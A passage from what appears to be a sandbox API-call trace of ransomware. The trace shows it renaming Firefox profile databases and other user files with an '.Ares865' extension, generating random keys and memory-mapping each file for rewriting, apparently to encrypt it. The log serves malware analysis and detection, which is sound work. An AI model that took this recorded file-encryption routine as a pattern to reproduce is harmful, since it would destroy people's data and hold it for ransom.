data\\mozilla\\firefox\\profiles\\silmbjec.default\\key3.db.ares865"), dwFlags=0x1) returned 1 [0051.335] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\key3.db.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\mozilla\\firefox\\profiles\\silmbjec.default\\key3.db.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x164 [0051.335] GetFileSizeEx (in: hFile=0x164, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=16384) returned 1 [0051.335] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3440020 [0051.336] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2cbbd8 [0051.336] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0380 [0051.336] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f00d8) returned 1 [0051.336] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0051.336] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0051.337] CreateFileMappingW (hFile=0x164, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x4300, lpName=0x0) returned 0x118 [0051.338] MapViewOfFile (hFileMappingObject=0x118, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x4300) returned 0x1a0000 [0051.339] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f00d8) returned 1 [0051.340] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0051.340] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0051.340] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d5f88 [0051.341] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\permissions.sqlite.Ares865") returned 115 [0051.341] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\permissions.sqlite" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\mozilla\\firefox\\profiles\\silmbjec.default\\permissions.sqlite"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\permissions.sqlite.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\mozilla\\firefox\\profiles\\silmbjec.default\\permissions.sqlite.ares865"), dwFlags=0x1) returned 1 [0051.341] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\permissions.sqlite.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\mozilla\\firefox\\profiles\\silmbjec.default\\permissions.sqlite.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x164 [0051.341] GetFileSizeEx (in: hFile=0x164, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=65536) returned 1 [0051.341] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3440020 [0051.342] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2cbbd8 [0051.342] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0380 [0051.342] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f00d8) returned 1 [0051.342] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0051.342] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0051.343] CreateFileMappingW (hFile=0x164, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x10300, lpName=0x0) returned 0x118 [0051.344] MapViewOfFile (hFileMappingObject=0x118, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x10300) returned 0x420000 [0051.349] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f00d8) returned 1 [0051.350] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0051.350] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0051.350] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d5f88 [0051.351] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\places.sqlite.Ares865") returned 110 [0051.351] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\places.sqlite" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\mozilla\\firefox\\profiles\\silmbjec.default\\places.sqlite"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\places.sqlite.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\mozilla\\firefox\\profiles\\silmbjec.default\\places.sqlite.ares865"), dwFlags=0x1) returned 1 [0051.352] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\places.sqlite.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\mozilla\\firefox\\profiles\\silmbjec.default\\places.sqlite.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x164 [0051.352] GetFileSizeEx (in: hFile=0x164, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=10485760) returned 1 [0051.352] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3440020 [0051.352] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2cbbd8 [0051.352] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0380 [0051.352] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f00d8) returned 1 [0051.353] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0051.353] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0051.353] CreateFileMappingW (hFile=0x164, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xa00300, lpName=0x0) returned 0x118 [0051.355] MapViewOfFile (hFileMappingObject=0x118, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0xa00000, dwNumberOfBytesToMap=0x300) returned 0x1a0000 [0051.355] MapViewOfFile (hFileMappingObject=0x118, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x200000) returned 0x3650000 [0051.449] UnmapViewOfFile (lpBaseAddress=0x3650000) returned 1 [0051.468] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f00d8) returned 1 [0051.482] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0051.482] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0051.484] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d5f88 [0051.496] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\secmod.db.Ares865") returned 106 [0051.497] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\secmod.db" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\mozilla\\firefox\\profiles\\silmbjec.default\\secmod.db"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\secmod.db.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\mozilla\\firefox\\profiles\\silmbjec.default\\secmod.db.ares865"), dwFlags=0x1) returned 1 [0051.553] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\secmod.db.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\mozilla\\firefox\\profiles\\silmbjec.default\\secmod.db.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x168 [0051.553] GetFileSizeEx (in: hFile=0x168, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=16384) returned 1 [0051.553] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3240020 [0051.553] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2cbbd8 [0051.554] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0380 [0051.554] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f00d8) returned 1 [0051.554] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0051.554] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0051.554] CreateFileMappingW (hFile=0x168, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x4300, lpName=0x0) returned 0x164 [0051.556] MapViewOfFile (hFileMappingObject=0x164, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x4300) returned 0x190000 [0051.600] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f00d8) returned 1 [0051.601] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0051.601] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0051.601] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d5f88 [0051.602] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\sessionstore.bak.Ares865") returned 113 [0051.602] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\sessionstore.bak" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\mozilla\\firefox\\profiles\\silmbjec.default\\sessionstore.bak"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\sessionstore.bak.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\mozilla\\firefox\\profiles\\silmbjec.default\\sessionstore.bak.ares865"), dwFlags=0x1) returned 1 [0051.604] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\sessionstore.bak.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\mozilla\\firefox\\profiles\\silmbjec.default\\sessionstore.bak.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x168 [0051.604] GetFileSizeEx (in: hFile=0x168, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=982) returned 1 [0051.604] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3240020 [0051.604] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2cbbd8 [0051.604] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0380 [0051.604] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f00d8) returned 1 [0051.605] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0051.605] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0051.605] CreateFileMappingW (hFile=0x168, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x6e0, lpName=0x0) returned 0x164 [0051.606] MapViewOfFile (hFileMappingObject=0x164, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x6e0) returned 0x190000 [0051.607] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f00d8) returned 1 [0051.608] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0051.608] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0051.608] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d5f88 [0051.608] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\signons.sqlite.Ares865") returned 111 [0051.609] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\signons.sqlite" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\mozilla\\firefox\\profiles\\silmbjec.default\\signons.sqlite"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\signons.sqlite.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\mozilla\\firefox\\profiles\\silmbjec.default\\signons.sqlite.ares865"), dwFlags=0x1) returned 1 [0051.610] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\signons.sqlite.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\mozilla\\firefox\\profiles\\silmbjec.default\\signons.sqlite.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x168 [0051.610] GetFileSizeEx (in: hFile=0x168, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=327680) returned 1 [0051.610] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3240020 [0051.610] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2cbbd8 [0051.610] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0380 [0051.610] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f00d8) returned 1 [0051.611] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0051.611] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0051.611] CreateFileMappingW (hFile=0x168, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x50300, lpName=0x0) returned 0x164 [0051.612] MapViewOfFile (hFileMappingObject=0x164, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x50300) returned 0x420000 [0051.625] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f00d8) returned 1 [0051.626] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0051.626] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0051.626] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d5f88 [0051.631] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webappsstore.sqlite.Ares865") returned 116 [0051.631] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webappsstore.sqlite" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\mozilla\\firefox\\profiles\\silmbjec.default\\webappsstore.sqlite"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webappsstore.sqlite.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\mozilla\\firefox\\profiles\\silmbjec.default\\webappsstore.sqlite.ares865"), dwFlags=0x1) returned 1 [0051.633] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webappsstore.sqlite.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\mozilla\\firefox\\profiles\\silmbjec.default\\webappsstore.sqlite.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x168 [0051.633] GetFileSizeEx (in: hFile=0x168, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=98304) returned 1 [0051.633] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3240020 [0051.633] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2cbbd8 [0051.633] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0380 [0051.633] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f00d8) returned 1 [0051.634] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0051.634] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0051.634] CreateFileMappingW (hFile=0x168, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x18300, lpName=0x0) returned 0x164 [0051.636] MapViewOfFile (hFileMappingObject=0x164, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x18300) returned 0x190000 [0051.641] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f00d8) returned 1 [0051.642] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0051.642] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0051.642] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2cb4b0 [0051.662] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite.Ares865") returned 156 [0051.662] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\mozilla\\firefox\\profiles\\silmbjec.default\\indexeddb\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\mozilla\\firefox\\profiles\\silmbjec.default\\indexeddb\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite.ares865"), dwFlags=0x1) returned 1 [0051.663] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\mozilla\\firefox\\profiles\\silmbjec.default\\indexeddb\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x120 [0051.663] GetFileSizeEx (in: hFile=0x120, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=655360) returned 1 [0051.663] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3240020 [0051.664] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d5f88 [0051.664] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0380 [0051.664] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f00d8) returned 1 [0051.664] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0051.664] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0051.665] CreateFileMappingW (hFile=0x120, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xa0300, lpName=0x0) returned 0x164 [0051.666] MapViewOfFile (hFileMappingObject=0x164, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xa0300) returned 0xb80000 [0051.692] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f00d8) returned 1 [0051.693] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0051.693] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0051.693] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2cbb08 [0052.037] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Publisher Building Blocks\\ContentStore.xml.Ares865") returned 107 [0052.037] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Publisher Building Blocks\\ContentStore.xml" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\microsoft\\publisher building blocks\\contentstore.xml"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Publisher Building Blocks\\ContentStore.xml.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\microsoft\\publisher building blocks\\contentstore.xml.ares865"), dwFlags=0x1) returned 1 [0052.038] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Publisher Building Blocks\\ContentStore.xml.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\microsoft\\publisher building blocks\\contentstore.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x120 [0052.038] GetFileSizeEx (in: hFile=0x120, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=168) returned 1 [0052.038] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3430020 [0052.040] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2cba28 [0052.040] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0490 [0052.040] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f05a0) returned 1 [0052.041] CryptGenRandom (in: hProv=0x2f05a0, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0052.041] CryptReleaseContext (hProv=0x2f05a0, dwFlags=0x0) returned 1 [0052.041] CreateFileMappingW (hFile=0x120, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x3b0, lpName=0x0) returned 0x168 [0052.044] MapViewOfFile (hFileMappingObject=0x168, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x3b0) returned 0x190000 [0052.044] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f05a0) returned 1 [0052.045] CryptGenRandom (in: hProv=0x2f05a0, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0052.045] CryptReleaseContext (hProv=0x2f05a0, dwFlags=0x0) returned 1 [0052.045] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2cbaa0 [0052.074] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS 